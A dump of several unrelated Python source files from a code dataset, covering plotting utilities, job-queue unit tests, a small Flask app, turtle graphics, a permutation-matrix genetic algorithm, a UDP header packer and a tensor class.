testClassLabels[testImageIndex]\n testImagesByClass[classIndex].append(testImage)\n\n # Pick a few hundered random images from each class\n imagesToPlotByClass = [[] for _ in range(10)]\n for classIndex in range(10):\n imagesInThisClass = testImagesByClass[classIndex]\n numberOfImagesInThisClass = len(imagesInThisClass)\n for _ in range(250):\n imageIndex = random.randint(0, numberOfImagesInThisClass - 1)\n imagesToPlotByClass[classIndex].append(imagesInThisClass[imageIndex])\n\n # Encode the images\n pointsByClass = encode(np.array(imagesToPlotByClass))\n \n # Plot a bunch of samples for each class\n for classIndex in range(10):\n points = pointsByClass[classIndex]\n pointsX = [point[0] for point in points]\n pointsY = [point[1] for point in points]\n maxX = np.max([maxX, np.max(pointsX)])\n maxY = np.max([maxY, np.max(pointsY)])\n plt.scatter(pointsX, pointsY, color=colorsByClass[classIndex], s=3)\n\n # Add some extra configuration to the plot\n plt.xlim([0, 0.1 + (maxX * 1.5)]) # Leave some space for the legend\n plt.ylim([0, 0.1 + (maxY * 1.1)])\n print('max x: ' + str(maxX) + ', max y: ' + str(maxY))\n plt.legend(\n handles=[\n mpatches.Patch(color=colorsByClass[0], label='T-shirt/top'),\n mpatches.Patch(color=colorsByClass[1], label='Trouser'),\n mpatches.Patch(color=colorsByClass[2], label='Pullover'),\n mpatches.Patch(color=colorsByClass[3], label='Dress'),\n mpatches.Patch(color=colorsByClass[4], label='Coat'),\n mpatches.Patch(color=colorsByClass[5], label='Sandal'),\n mpatches.Patch(color=colorsByClass[6], label='Shirt'),\n mpatches.Patch(color=colorsByClass[7], label='Sneaker'),\n mpatches.Patch(color=colorsByClass[8], label='Bag'),\n mpatches.Patch(color=colorsByClass[9], label='Ankle boot'),\n ],\n loc='upper right')\n plt.savefig(filePath)\n\n\ndef getADiverseSetOfColor(colorCount):\n BRIGHTNESS = 200\n RED_THRESHOLD = BRIGHTNESS\n GREEN_THRESHOLD = BRIGHTNESS * 2\n BLUE_THRESHOLD = BRIGHTNESS * 3\n COLOR_STEP = (BRIGHTNESS * 3) / colorCount\n\n # Spread out the colors\n colors = [None for i in range(colorCount)]\n for i in range(colorCount):\n colorAsNumber = math.floor(i * COLOR_STEP)\n if (0 <= colorAsNumber < RED_THRESHOLD):\n colorTuple = (RED_THRESHOLD - colorAsNumber, colorAsNumber, 0)\n elif (RED_THRESHOLD <= colorAsNumber < GREEN_THRESHOLD):\n colorTuple = (0, GREEN_THRESHOLD - colorAsNumber, colorAsNumber - RED_THRESHOLD)\n else:\n colorTuple = (colorAsNumber - GREEN_THRESHOLD, 0, BLUE_THRESHOLD - colorAsNumber)\n # Convert to hexcode\n colors[i] = '#%02x%02x%02x' % colorTuple\n\n return colors\n","sub_path":"Melchiah/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"421680056","text":"from datetime import datetime, timedelta\n\nfrom limpyd import fields\n\nfrom limpyd_jobs.models import Queue, Job, Error\nfrom limpyd_jobs import STATUSES\n\nfrom .base import LimpydBaseTest\n\n\nclass QueuesTest(LimpydBaseTest):\n\n def count_queues(self):\n return len(Queue.collection())\n\n def test_non_existing_queue_could_be_created(self):\n count_before = self.count_queues()\n Queue.get_queue(name='test')\n count_after = self.count_queues()\n self.assertEqual(count_after, count_before + 1)\n\n def test_existing_queue_should_be_returned(self):\n # create one\n Queue.get_queue(name='test')\n # and get it\n count_before = self.count_queues()\n Queue.get_queue(name='test')\n count_after = self.count_queues()\n self.assertEqual(count_after, count_before)\n\n def test_get_keys_should_return_all_keys_for_a_name(self):\n # create two with the same name and different priorities\n q0 = Queue.get_queue(name='test', priority=0)\n q1 = Queue.get_queue(name='test', priority=1)\n # and one with a different name\n qx = Queue.get_queue(name='foobar')\n\n # test we can get all keys for 'test', ordered by priority desc\n keys = Queue.get_keys('test')\n self.assertEqual(keys, [q1.waiting.key, q0.waiting.key])\n\n # tests for foobar\n keys = Queue.get_keys('foobar')\n self.assertEqual(keys, [qx.waiting.key])\n\n # tests for non existing name\n keys = Queue.get_keys('qux')\n self.assertEqual(keys, [])\n\n def test_extended_queue_can_accept_other_fields(self):\n class ExtendedQueue(Queue):\n namespace = 'test-queuestest'\n foo = fields.StringField()\n bar = fields.StringField()\n\n # create a new queue\n queue = ExtendedQueue.get_queue(name='test', priority=1, foo='FOO', bar='BAR')\n self.assertEqual(queue.foo.get(), 'FOO')\n self.assertEqual(queue.bar.get(), 'BAR')\n\n # get the same queue, extended fields won't be updated\n queue = ExtendedQueue.get_queue(name='test', priority=1, foo='FOO2', bar='BAR2')\n self.assertEqual(queue.foo.get(), 'FOO')\n self.assertEqual(queue.bar.get(), 'BAR')\n\n\nclass JobsTests(LimpydBaseTest):\n\n def assert_job_status_and_priority(self, job, status, priority):\n job_status, job_priority = job.hmget('status', 'priority')\n self.assertEqual(job_status, status)\n self.assertEqual(job_priority, priority)\n\n def test_adding_a_job_should_create_a_queue_with_the_job(self):\n job = Job.add_job(identifier='job:1', queue_name='test', priority=5)\n\n # count queues\n keys = Queue.get_keys('test')\n self.assertEqual(len(keys), 1)\n\n # get the new queue, should not create it (number of keys should be 1)\n queue = Queue.get_queue(name='test', priority=5)\n keys = Queue.get_keys('test')\n self.assertEqual(len(keys), 1)\n\n # check that the job is in the queue\n jobs = queue.waiting.lrange(0, -1)\n self.assertEqual(jobs, [str(job.get_pk())])\n\n # ... with the correct status and priority\n self.assert_job_status_and_priority(job, STATUSES.WAITING, '5')\n\n def test_adding_an_existing_job_should_do_nothing(self):\n job1 = Job.add_job(identifier='job:1', queue_name='test', priority=3)\n job2 = Job.add_job(identifier='job:1', queue_name='test', priority=3)\n\n # only one job\n self.assertEqual(job1.get_pk(), job2.get_pk())\n # is in high priority queue\n queue = Queue.get_queue(name='test', priority=3)\n self.assertEqual(queue.waiting.llen(), 1)\n # nothing in high priority queue\n queue = Queue.get_queue(name='test', priority=1)\n self.assertEqual(queue.waiting.llen(), 0)\n\n # we should still have original priority and status\n self.assert_job_status_and_priority(job1, STATUSES.WAITING, '3')\n # idem for job2 (which is, in fact, job1)\n self.assert_job_status_and_priority(job2, STATUSES.WAITING, '3')\n\n def test_adding_an_existing_job_with_lower_priority_should_do_nothing(self):\n job1 = Job.add_job(identifier='job:1', queue_name='test', priority=3)\n job2 = Job.add_job(identifier='job:1', queue_name='test', priority=1)\n\n # only one job\n self.assertEqual(job1.get_pk(), job2.get_pk())\n # is in high priority queue\n queue = Queue.get_queue(name='test', priority=3)\n self.assertEqual(queue.waiting.llen(), 1)\n # nothing in high priority queue\n queue = Queue.get_queue(name='test', priority=1)\n self.assertEqual(queue.waiting.llen(), 0)\n\n # we should still have original priority and status\n self.assert_job_status_and_priority(job1, STATUSES.WAITING, '3')\n # idem for job2 (which is, in fact, job1)\n self.assert_job_status_and_priority(job2, STATUSES.WAITING, '3')\n\n def test_adding_an_existing_job_with_higher_priority_should_change_its_queue(self):\n job1 = Job.add_job(identifier='job:1', queue_name='test', priority=1)\n queue1 = Queue.get_queue(name='test', priority=1)\n job2 = Job.add_job(identifier='job:1', queue_name='test', priority=2)\n queue2 = Queue.get_queue(name='test', priority=2)\n\n # only one job\n self.assertEqual(job1.get_pk(), job2.get_pk())\n # not anymore in queue with priority 1\n self.assertEqual(queue1.waiting.llen(), 0)\n # but now in queue with priority 2\n self.assertEqual(queue2.waiting.llen(), 1)\n\n # the new prioriy must be stored, and status should still be waiting\n self.assert_job_status_and_priority(job1, STATUSES.WAITING, '2')\n # idem for job2 (which is, in fact, job1)\n self.assert_job_status_and_priority(job2, STATUSES.WAITING, '2')\n\n def test_prepending_an_existing_job_should_move_it_at_the_beginning(self):\n queue = Queue.get_queue(name='test', priority=1)\n\n job1 = Job.add_job(identifier='job:1', queue_name='test', priority=1)\n job2 = Job.add_job(identifier='job:2', queue_name='test', priority=1)\n self.assertEqual(queue.waiting.lmembers(), [job1.get_pk(), job2.get_pk()])\n\n Job.add_job(identifier='job:2', queue_name='test', priority=1, prepend=True)\n self.assertEqual(queue.waiting.lmembers(), [job2.get_pk(), job1.get_pk()])\n\n def test_prepending_a_new_job_should_add_it_at_the_beginning(self):\n job1 = Job.add_job(identifier='job:1', queue_name='test', priority=1)\n job2 = Job.add_job(identifier='job:2', queue_name='test', priority=1, prepend=True)\n queue = Queue.get_queue(name='test', priority=1)\n self.assertEqual(queue.waiting.lmembers(), [job2.get_pk(), job1.get_pk()])\n\n def test_duration_should_compute_end_start_difference(self):\n start = datetime.utcnow()\n job = Job.add_job(identifier='job:1', queue_name='test', priority=1)\n job.hmset(start=start, end=start + timedelta(seconds=2))\n duration = job.duration\n self.assertEqual(duration, timedelta(seconds=2))\n\n def test_extended_job_can_accept_other_fields(self):\n class ExtendedJob(Job):\n namespace = 'test-jobstest'\n foo = fields.StringField()\n bar = fields.StringField()\n\n # create a new job\n job = ExtendedJob.add_job(identifier='job:1', queue_name='test',\n priority=1, foo='FOO', bar='BAR')\n self.assertEqual(job.foo.get(), 'FOO')\n self.assertEqual(job.bar.get(), 'BAR')\n\n # get the same job, extended fields won't be updated\n job = ExtendedJob.add_job(identifier='job:1', queue_name='test',\n priority=1, foo='FOO2', bar='BAR2')\n self.assertEqual(job.foo.get(), 'FOO')\n self.assertEqual(job.bar.get(), 'BAR')\n\n def test_using_a_subclass_of_queue_should_work(self):\n class TestQueue(Queue):\n namespace = 'test_using_a_subclass_of_queue_should_work'\n\n class TestJob(Job):\n namespace = 'test_using_a_subclass_of_queue_should_work'\n\n # not specifying queue_model should use the default Queue model\n default_queue = Queue.get_queue('test1')\n queue = TestQueue.get_queue('test1')\n Job.add_job(identifier='job:1', queue_name='test1')\n self.assertEqual(queue.waiting.llen(), 0)\n self.assertEqual(default_queue.waiting.llen(), 1)\n\n # idem with a subclass of job\n default_queue = Queue.get_queue('test2')\n queue = TestQueue.get_queue('test2')\n TestJob.add_job(identifier='job:2', queue_name='test2')\n self.assertEqual(queue.waiting.llen(), 0)\n self.assertEqual(default_queue.waiting.llen(), 1)\n\n # specifiying a queue_model in add_job should use the wanted queue\n default_queue = Queue.get_queue('test3')\n queue = TestQueue.get_queue('test3')\n Job.add_job(identifier='job:3', queue_name='test3', queue_model=TestQueue)\n self.assertEqual(queue.waiting.llen(), 1)\n self.assertEqual(default_queue.waiting.llen(), 0)\n\n # idem with a subclass of job\n default_queue = Queue.get_queue('test4')\n queue = TestQueue.get_queue('test4')\n TestJob.add_job(identifier='job:4', queue_name='test4', queue_model=TestQueue)\n self.assertEqual(queue.waiting.llen(), 1)\n self.assertEqual(default_queue.waiting.llen(), 0)\n\n # now test with a queue_model defined in the job class\n class TestJobWithQueueModel(Job):\n namespace = 'test_using_a_subclass_of_queue_should_work'\n queue_model = TestQueue\n\n default_queue = Queue.get_queue('test5')\n queue = TestQueue.get_queue('test5')\n TestJobWithQueueModel.add_job(identifier='job:5', queue_name='test5')\n self.assertEqual(queue.waiting.llen(), 1)\n self.assertEqual(default_queue.waiting.llen(), 0)\n\n\nclass ErrorsTest(LimpydBaseTest):\n\n class ExceptionWithCode(Exception):\n def __init__(self, message, code):\n super(ErrorsTest.ExceptionWithCode, self).__init__(message)\n self.message = message\n self.code = code\n\n def test_add_error_method_should_add_an_error_instance(self):\n e = ErrorsTest.ExceptionWithCode('the answer', 42)\n error1 = Error.add_error(queue_name='test', identifier='job:1', error=e)\n self.assertEqual(list(Error.collection()), [error1.get_pk()])\n Error.add_error(queue_name='test', identifier='job:1', error=e)\n self.assertEqual(len(Error.collection()), 2)\n\n def test_add_error_can_accept_an_exception_without_code(self):\n e = Exception('no code')\n error = Error.add_error(queue_name='test', identifier='job:1', error=e)\n self.assertEqual(error.code.hget(), None)\n\n def test_add_error_should_store_the_name_of_the_exception(self):\n e = Exception('foo')\n error = Error.add_error(queue_name='test', identifier='job:1', error=e)\n self.assertEqual(error.type.hget(), 'Exception')\n\n e = ErrorsTest.ExceptionWithCode('the answer', 42)\n error = Error.add_error(queue_name='test', identifier='job:1', error=e)\n self.assertEqual(error.type.hget(), 'ExceptionWithCode')\n\n def test_new_error_save_date_and_time_appart(self):\n e = ErrorsTest.ExceptionWithCode('the answer', 42)\n day = datetime(2012, 9, 29, 22, 58, 56)\n error = Error.add_error(queue_name='test', identifier='job:1', error=e,\n when=day)\n self.assertEqual(error.date.hget(), '2012-09-29')\n self.assertEqual(error.time.hget(), '22:58:56')\n self.assertEqual(error.datetime, day)\n\n def test_extended_error_can_accept_other_fields(self):\n class ExtendedError(Error):\n namespace = 'test-errorstest'\n foo = fields.StringField()\n bar = fields.StringField()\n\n e = ErrorsTest.ExceptionWithCode('the answer', 42)\n\n # create a new error\n error = ExtendedError.add_error(queue_name='test', identifier='job:1',\n error=e, foo='FOO', bar='BAR')\n self.assertEqual(error.foo.get(), 'FOO')\n self.assertEqual(error.bar.get(), 'BAR')\n","sub_path":"tests/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"162996900","text":"# def speak():\r\n# def v(t):\r\n# return t.lower() + '...'\r\n# return v\r\n#\r\n# Devre = speak()\r\n# print(Devre(\"A\"))\r\n\r\n\r\n# def null_decorator(func):\r\n# return func\r\n#\r\n#\r\n# def greet():\r\n# return 'Hello!'\r\n#\r\n# greet = null_decorator(greet)\r\n#\r\n# print(greet())\r\n\r\n\r\n# def greet():\r\n# return 'Hello!'.upper()\r\n#\r\n# def greet1():\r\n# return 'Hello!'.lower()\r\n#\r\n# print(greet())\r\n# print(greet1())\r\n\r\n\r\n\r\n# def uppercase(func, ):\r\n# def wrapper():\r\n# original_result = func()\r\n# modified_result = original_result.upper()\r\n# return modified_result\r\n#\r\n# def wrapper2():\r\n# original_result = func()\r\n# modified_result = original_result.lower()\r\n# return modified_result\r\n#\r\n# if func == low:\r\n# return wrapper\r\n# else:\r\n# return wrapper2\r\n#\r\n# @uppercase\r\n# def greet():\r\n# return 'Hello!'\r\n#\r\n# greet()\r\n\r\n\r\nf = \"Hello\"\r\ndef outer_func():\r\n f = \"Hi&Hello\"\r\n message = \"Devre\"\r\n return \"Hi\"\r\n\r\nv = outer_func()\r\nprint(v)\r\n#print(v.message)\r\nprint(v.f)\r\n\r\n\r\n","sub_path":"Advanced_Concepts/Decorators.py","file_name":"Decorators.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"388144002","text":"import pandas as pd\nimport plotly.plotly as py\nimport plotly.graph_objs as go\n# import plotly.figure_factory as fac\n# import plotly.offline as off\n# off.init_notebook_mode(connected=True)\n\n\nparty_color = {\n '더불어민주당': '#004EA2',\n '자유한국당': '#C8161E',\n '바른미래당': '#20B2AA',\n '민주평화당': '#40B02A',\n '정의당': '#FFCC00',\n '대한애국당': '#080B54',\n '민중당': '#F47920',\n '무소속': '#a6a6a6',\n}\n\n\ndef get_header_and_cells_from_df(df):\n header = [f'{e}' for e in df.columns.tolist()]\n values_list = df.values.tolist()\n cells = list(map(list, zip(*values_list)))\n return header, cells\n\n\ndef get_horizontal_bar_layout(\n annotations, shapes,\n title='',\n x_axis_title='',\n width='370',\n height='530',\n left=45, r=20, t=30, b=30,\n):\n return go.Layout(\n title=title,\n width=width,\n height=height,\n margin={\n 'pad': .5,\n 'l': left, 'r': r, 't': t, 'b': b,\n },\n xaxis=go.XAxis(\n title=x_axis_title,\n zeroline=False,\n showticklabels=False,\n fixedrange=True,\n ),\n yaxis=go.YAxis(\n fixedrange=True,\n ),\n annotations=annotations,\n shapes=shapes,\n )\n\n\ndef get_vertical_bar_layout(\n annotations, title='', width='370', height='400',\n x_axis_title='', y_axis_title='',\n left=30, r=20, t=30, b=60,\n):\n return go.Layout(\n title=title,\n width=width,\n height=height,\n margin={\n 'pad': 2,\n 'l': left, 'r': r, 't': t, 'b': b,\n },\n xaxis=go.XAxis(\n title=x_axis_title,\n zeroline=False,\n showticklabels=True,\n fixedrange=True,\n ),\n yaxis=dict(\n title=y_axis_title,\n zeroline=False,\n showticklabels=False,\n fixedrange=True,\n ),\n annotations=annotations,\n # shapes=shapes,\n )\n\n\ndef make_annotation(x, y):\n return go.Annotation(\n text=str(x), # text is the y-coord\n showarrow=False, # annotation w/o arrows, default is True\n x=x, # set x position\n xref='x', # position text horizontally with x-coords\n xanchor='left', # x position corresp. to center of text\n yref='y', # set y position\n yanchor='auto', # position text vertically with y-coords\n y=y, # y position corresp. to top of text\n font=go.Font(\n color='#262626', # set font color\n size=13 # and size\n )\n )\n\n\ndef get_hovertext_list(*args):\n '''\n *args: list of Series\n '''\n series_to_list = [x.tolist() for x in args]\n return list('
'.join(x) for x in zip(*series_to_list))\n\n\ndef get_party_color_dict(party_series):\n party_list = party_series.tolist()\n color_list = [party_color[x] for x in party_list]\n return dict(color=color_list)\n\n\ndef get_legend_text_party(party_series, y_start=0.94, y_height=0.05, x=0.9):\n party_counts = party_series.value_counts()\n res = []\n y_offset = 0\n for i, p in party_counts.iteritems():\n y = y_start - y_height * y_offset\n res.append(\n dict(\n text=f'{i}({p}명)',\n showarrow=False,\n xref='paper',\n yref='paper',\n x=x,\n y=y,\n )\n )\n y_offset += 1\n return res\n\n\ndef get_legend_rect_party(party_series, rect_height=0.04, rect_width=0.03,\n rect_gap=0.01, y_start=0.94, x0=0.91):\n party_counts = party_series.value_counts()\n party_list = party_counts.index.tolist()\n res = []\n\n for i, p in enumerate(party_list):\n y0 = y_start - (rect_height + rect_gap)*i\n res.append(\n {\n 'type': 'rect',\n 'xref': 'paper',\n 'yref': 'paper',\n 'x0': x0,\n 'x1': x0 + rect_width,\n 'y0': y0,\n 'y1': y0 - rect_height,\n 'fillcolor': party_color[p],\n 'line': {\n 'color': party_color[p],\n }\n }\n )\n return res\n","sub_path":"lib/plotly.py","file_name":"plotly.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"54814763","text":"import pandas as pd\nfrom flask import Flask, render_template\nimport datetime\n\napp = Flask(__name__)\n\ndata = {'Tiempo':['Lluvioso'],'Temperatura':['30 grados'], 'Humedad':['10%']}\ndf = pd.DataFrame(data, columns = ['Tiempo','Temperatura','Humedad'])\ndf.to_csv('09052019.csv')\n\ndef myparser(x):\n return datetime.strptime(x, '%d/%m/%Y %H:%M:%S')\n\n@app.route('/')\ndef archivo():\n df= pd.read_csv('09052019.csv', parse_dates=True, date_parser=myparser, header=None)\n listk = list(df.values)\n return render_template('index.html', listk = listk)\n\nif __name__ == \"__main__\":\n app.run(debug= True, port=5000)\n\n\n\n\n","sub_path":"parcial.py","file_name":"parcial.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"544284308","text":"# function polygon with turtle object t, length of sides, n number of sides \n# Importing module turtle for GUI\nimport turtle\n\n\ndef polygon(t, length, n):\n for i in range(n):\n t.fd(length)\n t.lt(360 / n)\n\n\ndef center(t, length, n):\n t.lt(360 / n)\n t.fd(length)\n\n\n\"\"\"\ndef outer(t,length,n):\n t.lt(125)\n for i in range(n):\n t.fd(length + 20)\n t.lt(72)\n #t.fd(120)\n \"\"\"\n\n\ndef angles(t, length, n):\n # t.fd(length)\n for i in range(n):\n t.fd(length)\n t.bk(length)\n t.lt(360 / n)\n t.fd(length)\n\n\nbob = turtle.Turtle() # turtle object stored in bob\n\n# Calling function square by passing turtle object bob & length 50 pixels\n# polygon(bob,100,5)\n\n# polygon(bob,100,5)\npolygon(bob, 100, 6)\ncenter(bob, 100, 6)\nangles(bob, 100, 6)\n\n# Need to do better calling\n","sub_path":"Turtle ui/turtle_Pies2.py","file_name":"turtle_Pies2.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"198428390","text":"from Permutation import Permutation\nfrom Utility import next_permutation\n\nimport itertools\nimport math\nimport random\n\nclass Matrix():\n def __init__(self, size):\n self.size = size\n self.permutations = self.generate_permutation_pool()\n\n def set_permutations(self, permutations):\n self.size = int(len(permutations) / 2)\n self.permutations = permutations\n\n def get_all_permutations(self):\n # Returns a list of all n! permutations (as lists) of an integer n (n being the size of the matrix)\n return list(list(x) for x in itertools.permutations(list(range(1, self.size + 1))))\n\n def generate_n_permutations(self):\n # Randomly selects n unique permutations and returns them as a list\n all_permutations = self.get_all_permutations()\n selected_permutations = [] \n for _ in range(self.size):\n permutation = random.choice(all_permutations)\n selected_permutations.append(permutation)\n all_permutations.remove(permutation)\n return selected_permutations\n\n def generate_permutation_pool(self):\n # generates the 2 permutation sets that make up the matrix\n permutations1 = [Permutation(perm) for perm in self.generate_n_permutations()]\n permutations2 = [Permutation(perm) for perm in self.generate_n_permutations()]\n return permutations1 + permutations2\n\n def mutate(self):\n # By mutating a permutation at a random position gets replaced by another random permutation\n i = random.randint(0, self.size * 2 - 1)\n j = random.randint(0, self.size * 2 - 1)\n x = list(list(itertools.permutations(list(range(1, self.size + 1))))[j])\n self.permutations[i] = Permutation(x)\n \n def fitness(self):\n f = 0 \n pool1 = self.permutations[:self.size] # first set of permutations\n pool2 = self.permutations[self.size:] # second set of permutations\n\n for i in range(self.size):\n if any(pool1[i].get_symbols()) > self.size:\n print(\"!\")\n return 0\n if any(pool2[i].get_symbols()) > self.size:\n print(\"!\")\n return 0\n\n # check that all columns form permutations\n for i in range(self.size):\n perm = []\n for c in pool1:\n sym = c.get_symbols()\n perm.append(sym[i])\n if len(perm) == len(set(perm)):\n f += 1\n perm = []\n for c in pool2:\n sym = c.get_symbols()\n perm.append(sym[i])\n if len(perm) == len(set(perm)):\n f += 1\n # check that no row-wise pairs are identical\n for i in range(self.size):\n sym1 = pool1[i].get_symbols()\n sym2 = pool2[i].get_symbols()\n if len(list(zip(sym1, sym2))) != len(set(list(zip(sym1, sym2)))):\n f -= 1\n return f\n\n def get_neighbours(self):\n perms = [p.get_symbols() for p in self.permutations]\n # neighbours are obtained by shuffling each permutation, one by one, once\n # resulting in 2 * n neighbours\n for i in range(self.size * 2):\n copy = perms[:]\n copy[i] = next_permutation(copy[i])\n m = Matrix(self.size)\n m.set_permutations([Permutation(x) for x in copy])\n yield m\n\n def get_size(self):\n return self.size\n\n def get_permutations(self):\n return self.permutations\n\n def __mul__(self, i):\n m = Matrix(self.size)\n m.set_permutations([x * i for x in self.permutations])\n return m\n\n def __rmul__(self, i):\n m = Matrix(self.size)\n m.set_permutations([x * i for x in self.permutations])\n return m\n\n def __add__(self, other):\n m = Matrix(self.size)\n m.set_permutations([x[0] + x[1] for x in list(zip(self.permutations, other.permutations))])\n return m\n\n def __sub__(self, other):\n m = Matrix(self.size)\n m.set_permutations([x[0] - x[1] for x in list(zip(self.permutations, other.permutations))])\n return m\n\n def __str__(self):\n return str([str(c) for c in self.permutations])\n\n","sub_path":"Artificial Intelligence/Lab3/Matrix.py","file_name":"Matrix.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"119197252","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport struct\nimport socket\nfrom common import checksum\n\n\nclass UDP(object):\n def __init__(self, src_port, dst_port, payload=''):\n self.src_port = src_port\n self.dst_port = dst_port\n self.payload = payload\n self.checksum = 0\n self.length = 8 # UDP header len\n\n def pack(self, src, dst, proto=socket.IPPROTO_UDP):\n length = self.length + len(self.payload)\n pseudo_header = struct.pack('!4s4sBBH', src, dst, 0, proto, length)\n self.checksum = checksum(pseudo_header)\n packet = struct.pack('!HHHH',\n self.src_port, self.dst_port, length, 0)\n return packet","sub_path":"plugin/udp.py","file_name":"udp.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"359723690","text":"\"\"\"\nThis module contains classes and functions representing tensors\nof trigonometric polynomials and relating operators.\n\"\"\"\n\nimport numpy as np\nfrom ffthompy.matvec import get_name\nfrom matvec import Scalar\nfrom ffthompy.mechanics.matcoef import ElasticTensor\n\n\nclass TensorFuns():\n\n def mean_ind(self):\n return tuple(np.round(np.array(self.N)/2))\n\n def __getitem__(self, ii):\n return self.val[ii]\n\n def point(self, ii):\n val = np.empty(self.shape)\n for ind in np.ndindex(*self.shape):\n val[ind] = self.val[ind][ii]\n return val\n\n def sub(self, ii):\n self.val[ii]\n\n def __repr__(self, full=False, detailed=False):\n keys = ['name', 'Y', 'shape', 'N', 'Fourier', 'norm']\n ss = \"Class : %s(%d) \\n\" % (self.__class__.__name__, self.order)\n skip = 4*' '\n nstr = np.array([key.__len__() for key in keys]).max()\n\n for key in keys:\n attr = getattr(self, key)\n if callable(attr):\n ss += '{0}{1}{3} = {2}\\n'.format(skip, key, str(attr()), (nstr-key.__len__())*' ')\n else:\n ss += '{0}{1}{3} = {2}\\n'.format(skip, key, str(attr), (nstr-key.__len__())*' ')\n\n if np.prod(np.array(self.shape)) < 20 or detailed:\n ss += '{0}norm component-wise =\\n{1}\\n'.format(skip, str(self.norm(componentwise=True)))\n ss += '{0}mean = \\n{1}\\n'.format(skip, str(self.mean()))\n if full:\n ss += '{0}val = \\n{1}'.format(skip, str(self.val))\n return ss\n\nclass Tensor(TensorFuns):\n\n def __init__(self, name='', val=None, order=None, shape=None, N=None, Y=None,\n Fourier=False, multype='scal'):\n\n self.name = name\n self.Fourier = Fourier\n\n if isinstance(val, np.ndarray): # define: val + order\n self.val = val\n if order is not None:\n self.order = int(order)\n self.shape = self.val.shape[:order]\n self.N = self.val.shape[order:]\n else:\n raise ValueError('order is not defined!')\n\n elif shape is not None and N is not None: # define: shape + N\n self.N = tuple(np.array(N, dtype=np.int))\n self.shape = tuple(np.array(shape, dtype=np.int))\n self.order = len(self.shape)\n if self.Fourier:\n self.val = np.zeros(self.shape + self.N, dtype=np.complex)\n else:\n self.val = np.zeros(self.shape + self.N, dtype=np.float)\n else:\n raise ValueError('Initialization of Tensor.')\n\n self.dim = self.N.__len__()\n if Y is None:\n self.Y = np.ones(self.dim, dtype=np.float)\n else:\n self.Y = np.array(Y, dtype=np.float)\n\n # definition of __mul__ operation\n if multype in ['scal', 'scalar']:\n self.mul_str = 'scalar'\n self.__mul__ = self.scalar_product\n elif multype in [21, '21']:\n self.mul_str = 'ij...,j...->i...'\n self.__mul__ = self._mul\n self.__call__ = self._mul\n elif multype in [42, '42']:\n self.mul_str = 'ijkl...,kl...->ij...'\n self.__mul__ = self._mul\n self.__call__ = self._mul\n else:\n self.mul_str = multype\n self.__mul__ = self._mul\n self.__call__ = self._mul\n\n def randomize(self):\n self.val = np.random.random(self.val.shape)\n return self\n\n def __neg__(self):\n res = self.copy(name='-'+self.name)\n res.val = -res.val\n return res\n\n def __add__(self, x):\n if isinstance(x, Tensor):\n assert(self.Fourier == x.Fourier)\n assert(self.val.shape==x.val.shape)\n name = get_name(self.name, '+', x.name)\n return Tensor(name=name, val=self.val+x.val, Fourier=self.Fourier,\n order=self.order, multype=self.mul_str)\n elif isinstance(x, np.ndarray) or isinstance(x, float):\n self.val += x\n return self\n else:\n raise ValueError('Tensor.__add__')\n\n def __sub__(self, x):\n return self.__add__(-x)\n\n def scalar_product(self, x):\n assert isinstance(x, Tensor)\n assert self.val.shape == x.val.shape\n scal = np.real(np.sum(self.val[:]*np.conj(x.val[:])))\n if not self.Fourier:\n scal = scal / np.prod(self.N)\n return scal\n\n def _mul(self, x):\n return self.einsum(self.mul_str, self, x)\n\n def __rmul__(self, x):\n if isinstance(x, Scalar):\n self.val *= Scalar.val\n return self\n\n elif np.size(x) == 1 or isinstance(x, 'float'):\n self.val *= x\n return self\n\n else:\n raise ValueError()\n\n @staticmethod\n def einsum(str_operator, x, y):\n assert(x.Fourier==y.Fourier)\n assert(x.N==y.N)\n val = np.einsum(str_operator, x.val, y.val)\n order = len(val.shape)-len(x.N)\n return Tensor(name='{0}({1})'.format(x.name, y.name),\n val=val, order=order, Fourier=x.Fourier)\n\n @staticmethod\n def norm_fun(obj, ntype):\n if ntype in ['L2', 2]:\n scal = (obj.scalar_product(obj))**0.5\n elif ntype == 1:\n scal = np.sum(np.abs(obj.val))\n elif ntype == 'inf':\n scal = np.max(np.abs(obj.val))\n else:\n msg = \"The norm (%s) of VecTri is not implemented!\" % ntype\n raise NotImplementedError(msg)\n return scal\n\n def norm(self, ntype='L2', componentwise=False):\n if componentwise:\n scal = np.empty(self.shape)\n for ind in np.ndindex(*self.shape):\n obj = Tensor(name='aux', val=self.val[ind], order=0, Fourier=self.Fourier)\n scal[ind] = self.norm_fun(obj, ntype='L2')\n return scal\n else:\n return self.norm_fun(self, ntype=ntype)\n\n def mean(self):\n \"\"\"\n Mean of trigonometric polynomial of shape of macroscopic vector.\n \"\"\"\n mean = np.zeros(self.shape)\n if self.Fourier:\n ind = self.mean_ind()\n for di in np.ndindex(*self.shape):\n mean[di] = np.real(self.val[di][ind])\n else:\n for di in np.ndindex(*self.shape):\n mean[di] = np.mean(self.val[di])\n return mean\n\n def add_mean(self, mean):\n assert(self.shape==mean.shape)\n\n if self.Fourier:\n ind = self.mean_ind()\n for di in np.ndindex(*self.shape):\n self.val[di+ind] = mean[di]\n else:\n for di in np.ndindex(*self.shape):\n self.val[di] += mean[di]\n return self\n\n def set_mean(self, mean):\n assert(self.shape==mean.shape)\n self.add_mean(-self.mean()) # set mean to zero\n\n if self.Fourier:\n ind = self.mean_ind()\n for di in np.ndindex(*self.shape):\n self.val[di+ind] = mean[di]\n else:\n for di in 